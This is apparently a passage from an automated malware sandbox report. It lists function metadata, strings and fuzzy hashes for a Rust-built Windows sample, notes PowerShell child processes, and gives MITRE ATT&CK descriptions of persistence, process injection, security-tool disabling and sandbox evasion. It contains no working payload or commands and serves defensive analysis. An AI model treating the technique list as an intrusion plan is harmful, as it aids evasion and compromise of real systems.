Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: callocfree
String ID:
API String ID: 306872129-0
Opcode ID: 1c062614b4007bb50931f4d551f4aae67246f8b63b8ba65fbc46f03da7f7952d
Instruction ID: ee6f699e686a7eb44e497248bf869e1519bf7fa6b6433cfa5af0367deac7fc1b
Opcode Fuzzy Hash: 1c062614b4007bb50931f4d551f4aae67246f8b63b8ba65fbc46f03da7f7952d
Instruction Fuzzy Hash: DE814A32908BC186E341DF38D5443E977A0FB59B5CF185339DF980A6AAEF799189C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1EFD00, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78D1F5700: InitializeCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5753
Part of subcall function 00007FF78D1F5700: DeleteCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5767
Part of subcall function 00007FF78D1F5700: EnterCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5785

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00007FF78D1EFA79,00000000,?,?), ref: 00007FF78D1EFDC2

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXESlibrary\std\src\sys\windows\thread_local_key.rs, xrefs: 00007FF78D1EFE3E
ReleaseSRWLockExclusive, xrefs: 00007FF78D1EFE07
AcquireSRWLockExclusive, xrefs: 00007FF78D1EFDC9
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF78D1EFE73

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterInitializeLeave
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$ReleaseSRWLockExclusive$assertion failed: key != c::TLS_OUT_OF_INDEXESlibrary\std\src\sys\windows\thread_local_key.rs
API String ID: 1090962914-1632340299
Opcode ID: 6530141741cd652e9b56af171270b46b71c3a9eb71c5254e3f135e984cc1942c
Instruction ID: ecedff4dc07d5e12e99d462d39017bb9df9bdd08700431e58af3d964d3ba3db7
Opcode Fuzzy Hash: 6530141741cd652e9b56af171270b46b71c3a9eb71c5254e3f135e984cc1942c
Instruction Fuzzy Hash: A7515922E0DB5696FA10BB50E8403F8AAA0BF48754FE54135DE5D43795FF3CA94AC360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D2048C0, Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 261COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D204A03

Strings

capacity overflow, xrefs: 00007FF78D2048C4
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF78D2048E7

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$capacity overflow
API String ID: 2162964266-2340786982
Opcode ID: 62b8c8a8dd7c387acb1af976f192dc5865cdfa197a9f6bb3c39cb107a85f3866
Instruction ID: 024321e4018c5fa9dab70e3566f1681d49bc5281a1d3327a65c7d122759629cb
Opcode Fuzzy Hash: 62b8c8a8dd7c387acb1af976f192dc5865cdfa197a9f6bb3c39cb107a85f3866
Instruction Fuzzy Hash: 52A18122F0D75295FB05AB61A5103F9A7A1BF04B88FA4C435DD4D1BB85FE3CA94AC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F4F30, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF78D1F5096
memmove.VCRUNTIME140 ref: 00007FF78D1F5125
GetLastError.KERNEL32 ref: 00007FF78D1F5139

Strings

*advancing IoSlice beyond its lengthlibrary\std\src\sys\windows\io.rs, xrefs: 00007FF78D1F5013

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastmemmovememset
String ID: *advancing IoSlice beyond its lengthlibrary\std\src\sys\windows\io.rs
API String ID: 4234947236-2463052000
Opcode ID: 7e7636516f5579104a916d06823ffce8e337809ed11d897f469e0e1a2469565c
Instruction ID: 1e211a7a55b83c2e293db00c540bf838a0445260aeae94cc6e20e90fc2e762bc
Opcode Fuzzy Hash: 7e7636516f5579104a916d06823ffce8e337809ed11d897f469e0e1a2469565c
Instruction Fuzzy Hash: 3771D072B0DB8284FB61AF65E8447F8A761BF44798F964130DE1C4AB85FF38A589C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1F1270, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF78D1F1456

Strings

ReleaseSRWLockExclusive, xrefs: 00007FF78D1F14A1
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF78D1F1399
AcquireSRWLockExclusive, xrefs: 00007FF78D1F1463

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalLeaveSection
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$ReleaseSRWLockExclusive
API String ID: 3988221542-3172517583
Opcode ID: 269145a653caa180ea452d7065c21ad29b1b299577cc0f53399517730478d321
Instruction ID: 3f279a36feaec0781f5f41ea97f7f40ff089ec133c6e9ef04ac22cd751b3f5c8
Opcode Fuzzy Hash: 269145a653caa180ea452d7065c21ad29b1b299577cc0f53399517730478d321
Instruction Fuzzy Hash: BD814C36A0CB4685EB10AF61E8403E8B7A4FF44B98FA14536DA4D47794EF3CD199C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1BCB60, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1BCBC3
memmove.VCRUNTIME140 ref: 00007FF78D1BCCC5
memmove.VCRUNTIME140 ref: 00007FF78D1BCD01

Strings

failed to spawn thread, xrefs: 00007FF78D1BCDED

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: failed to spawn thread
API String ID: 2162964266-1155329311
Opcode ID: 10feef97b7b898fc22e1c27f2601516b5274103c17281ffcd3e64f505c0bfc82
Instruction ID: 2ce774b493c4d8b4ac046d8dab3b05f38f12c906151ce86a090598fb6464a03b
Opcode Fuzzy Hash: 10feef97b7b898fc22e1c27f2601516b5274103c17281ffcd3e64f505c0bfc82
Instruction Fuzzy Hash: A3819132908BC589E761AF35EC413E97BA0FF58358F954125EA8C0BB95EF38D689C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1B9C00, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1B9C63
memmove.VCRUNTIME140 ref: 00007FF78D1B9D65
memmove.VCRUNTIME140 ref: 00007FF78D1B9DA1

Strings

failed to spawn thread, xrefs: 00007FF78D1B9E8D

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: failed to spawn thread
API String ID: 2162964266-1155329311
Opcode ID: 539a6ec69ba32b052c2826e54edfd7b66f391585b6a7997018d148de8a04988d
Instruction ID: af878a2ea138e8d3e84b759dbf3f000a14ef63877638c69d6036fbab44e5b5a7
Opcode Fuzzy Hash: 539a6ec69ba32b052c2826e54edfd7b66f391585b6a7997018d148de8a04988d
Instruction Fuzzy Hash: 65818032908BC589E7629F24EC413E977A0FF58358F954125EA8C0BB95EF39D68AC350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1EDA60, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78D1F5700: InitializeCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5753
Part of subcall function 00007FF78D1F5700: DeleteCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5767
Part of subcall function 00007FF78D1F5700: EnterCriticalSection.KERNEL32(?,?,00000006,00000000,00007FF78D1EFD27,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00007FF78D1F5785

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF78D1CC08E), ref: 00007FF78D1EDB19

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF78D1EDC60
ReleaseSRWLockExclusive, xrefs: 00007FF78D1EDB65
AcquireSRWLockExclusive, xrefs: 00007FF78D1EDB35

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterInitializeLeave
String ID: AcquireSRWLockExclusive$ReleaseSRWLockExclusive$called `Option::unwrap()` on a `None` value
API String ID: 1090962914-225517436
Opcode ID: cf9136be326b72ba48584fd1edd60a2b8242240e418c1ecaa53a87a960963795
Instruction ID: bb72a62cd73349dd28e595ceb9cccc0d7c05c0c78724c322f546d9539edf3ee2
Opcode Fuzzy Hash: cf9136be326b72ba48584fd1edd60a2b8242240e418c1ecaa53a87a960963795
Instruction Fuzzy Hash: 6B51B162F0DA0695FA14AB55F8402B8AB61BF487A4FE58035DE1D07794FF3CE48AC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1CDF10, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1CDFCA
memmove.VCRUNTIME140 ref: 00007FF78D1CE063
memmove.VCRUNTIME140 ref: 00007FF78D1CE0A0

Strings

stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs, xrefs: 00007FF78D1CE0D8

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs
API String ID: 2162964266-704964686
Opcode ID: d300be64059b9a8c2e62c015c953dcda5bf751e91c2161f82d7f4a67bd8d87bb
Instruction ID: cfbc345220fa3d553f104ee3eb7348c42f4ae0a8e00499cc78f00561e2711c34
Opcode Fuzzy Hash: d300be64059b9a8c2e62c015c953dcda5bf751e91c2161f82d7f4a67bd8d87bb
Instruction Fuzzy Hash: DE412552F1C68201EA50AA2678041FADB15BF55BF4FA58631EE2C077DAFE3DD54AC310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1CE100, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF78D1CE1B3
memmove.VCRUNTIME140 ref: 00007FF78D1CE233
memmove.VCRUNTIME140 ref: 00007FF78D1CE272

Strings

stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs, xrefs: 00007FF78D1CE2E3

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs
API String ID: 2162964266-704964686
Opcode ID: e79331bed9875dc77c98c0c6f5d64a739d2cbce2b7eb7a883475d5b39b377b5d
Instruction ID: fb86f9acf6605d692c231e71ea910488e1070f4daf13e01bf8dfd803c52d5bf5
Opcode Fuzzy Hash: e79331bed9875dc77c98c0c6f5d64a739d2cbce2b7eb7a883475d5b39b377b5d
Instruction Fuzzy Hash: D941E562F1C68241E950AB15A8042FADB20BF467F4FA54631EE6C1BBCAEE3CD549C210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D1CDD80, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78D1CF3B0: memmove.VCRUNTIME140 ref: 00007FF78D1CF3FF
Part of subcall function 00007FF78D1CF3B0: memmove.VCRUNTIME140 ref: 00007FF78D1CF472

memmove.VCRUNTIME140 ref: 00007FF78D1CDE92
memmove.VCRUNTIME140 ref: 00007FF78D1CDEAA

Strings

stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs, xrefs: 00007FF78D1CDEBD
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF78D1CDEE3

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: called `Result::unwrap()` on an `Err` value$stream cipher loop detectedC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\cipher-0.2.5\src\stream.rs
API String ID: 2162964266-325024098
Opcode ID: f69e7fa7bf9ac8ec2f39a6dc52de43ef0154c7b927b3edd6ac1689c640563844
Instruction ID: 3c2566e66f14f18291a91fe1082f4fd536c724e76c724389d74708544527e515
Opcode Fuzzy Hash: f69e7fa7bf9ac8ec2f39a6dc52de43ef0154c7b927b3edd6ac1689c640563844
Instruction Fuzzy Hash: AA41741251C6C184F752D728E06879BAF60AB93358F541064F7C90BBCADB7ED14DCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF78D242540, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF78D1A2970,00007FF78D225BB9,?,?,?,?,00007FF78D224F2B,?,?,?,?,00007FF78D227012), ref: 00007FF78D242568
GetEnvironmentVariableA.KERNEL32(?,?,00007FF78D1A2970,00007FF78D225BB9,?,?,?,?,00007FF78D224F2B,?,?,?,?,00007FF78D227012), ref: 00007FF78D24258E
realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF78D1A2970,00007FF78D225BB9,?,?,?,?,00007FF78D224F2B,?,?,?,?,00007FF78D227012), ref: 00007FF78D2425AF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF78D1A2970,00007FF78D225BB9,?,?,?,?,00007FF78D224F2B,?,?,?,?,00007FF78D227012), ref: 00007FF78D2425C0

Memory Dump Source

Source File: 00000016.00000002.794161875.00007FF78D1A1000.00000020.00020000.sdmp, Offset: 00007FF78D1A0000, based on PE: true

Associated: 00000016.00000002.794148687.00007FF78D1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.794313814.00007FF78D27F000.00000004.00020000.sdmp Download File
Associated: 00000016.00000002.794326989.00007FF78D280000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: realloc$EnvironmentVariablefree
String ID:
API String ID: 2828309815-0
Opcode ID: 8639e72a8be18d33545ec63bd33454072359233b89793295497a631e42e859dc
Instruction ID: 983506a434b1e54f2b13afbe4082dd2f27cd3c5f1eb6fe1e7503ed4eb7e2a857
Opcode Fuzzy Hash: 8639e72a8be18d33545ec63bd33454072359233b89793295497a631e42e859dc
Instruction Fuzzy Hash: 3711A921B4DB4246EA64AB13659827AE192FF48FC4FA80035DD4D43B54FE7CE448C750

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 2792 Parent PID: 3492 powershell.exeCOMMON

Executed Functions

Function 00007FFA347F61A6, Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.740697756.00007FFA347F0000.00000040.00000001.sdmp, Offset: 00007FFA347F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7735501cc5028d8e878b303737ac7612bbff5e2b26f98e3c9a1c15913f8badde
Instruction ID: e08f00998c5e7d49b4cbfc3a1fc93e1d026f26cc94e96968e6905205d44f9cc6
Opcode Fuzzy Hash: 7735501cc5028d8e878b303737ac7612bbff5e2b26f98e3c9a1c15913f8badde
Instruction Fuzzy Hash: F7F18230908A8D8FEBB9DF28C8567E937E1FF55311F04826ED84DC7291DE75A9418782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA347F6B66, Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.740697756.00007FFA347F0000.00000040.00000001.sdmp, Offset: 00007FFA347F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a157fbb4a245ce7af0f60b4646ffd476ee8c068c743c6ce9de3bf669d79a0ab
Instruction ID: 86c233eb41eb995496aa945f80f518660eca48003d095acfc7fe8f66095fef27
Opcode Fuzzy Hash: 3a157fbb4a245ce7af0f60b4646ffd476ee8c068c743c6ce9de3bf669d79a0ab
Instruction Fuzzy Hash: 0BB1E730508A8D8FEB65DF2888557E93BE0EF16310F04816EE84DC7292DE75A945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA347F1775, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.740697756.00007FFA347F0000.00000040.00000001.sdmp, Offset: 00007FFA347F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abfb08509ba2ad3dcb560ce6df667010d1f52f3db04242593f4bff19157a36dc
Instruction ID: ea5b07eda95dee398746e1f7b861e1810d5fcdd3d11c52c03835ae663f2f7acd
Opcode Fuzzy Hash: abfb08509ba2ad3dcb560ce6df667010d1f52f3db04242593f4bff19157a36dc
Instruction Fuzzy Hash: 8501677111CB0C8FD744EF0CE451AA6B7E0FB95364F10056EE58EC3651DA36E881CB45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 5996 Parent PID: 3492 powershell.exeCOMMON

Executed Functions

Function 00007FFA347E1775, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.766858037.00007FFA347E0000.00000040.00000001.sdmp, Offset: 00007FFA347E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c77019f54d51d50a7da08af708998f1d891624b57d0045a7a00b50aa4ea0557a
Instruction ID: f572ce012138e4eddc618a26e0a4d1ed79d6ea8021cce198c7df6f75d4ede5d8
Opcode Fuzzy Hash: c77019f54d51d50a7da08af708998f1d891624b57d0045a7a00b50aa4ea0557a
Instruction Fuzzy Hash: 4901677111CB0C8FD744EF0CE451AA6B7E0FB95364F50056EE58AC7651DA36E881CB45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 6240 Parent PID: 3492 powershell.exeCOMMON

Executed Functions

Function 00007FFA37D41775, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.793211253.00007FFA37D40000.00000040.00000001.sdmp, Offset: 00007FFA37D40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bba3d2399a13de9fab04ad294c5acc210da5c9b9c64e4e87568031aac76e8eef
Instruction ID: b5f0b14e43f0852b768624b98bc8cd1617c1877f1741ca8f0a7c9f4016e650c1
Opcode Fuzzy Hash: bba3d2399a13de9fab04ad294c5acc210da5c9b9c64e4e87568031aac76e8eef
Instruction Fuzzy Hash: 2501677111CB0C8FD744EF0CE451AA6B7E0FB95364F10056EE58AC3652DA36E881CB46

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

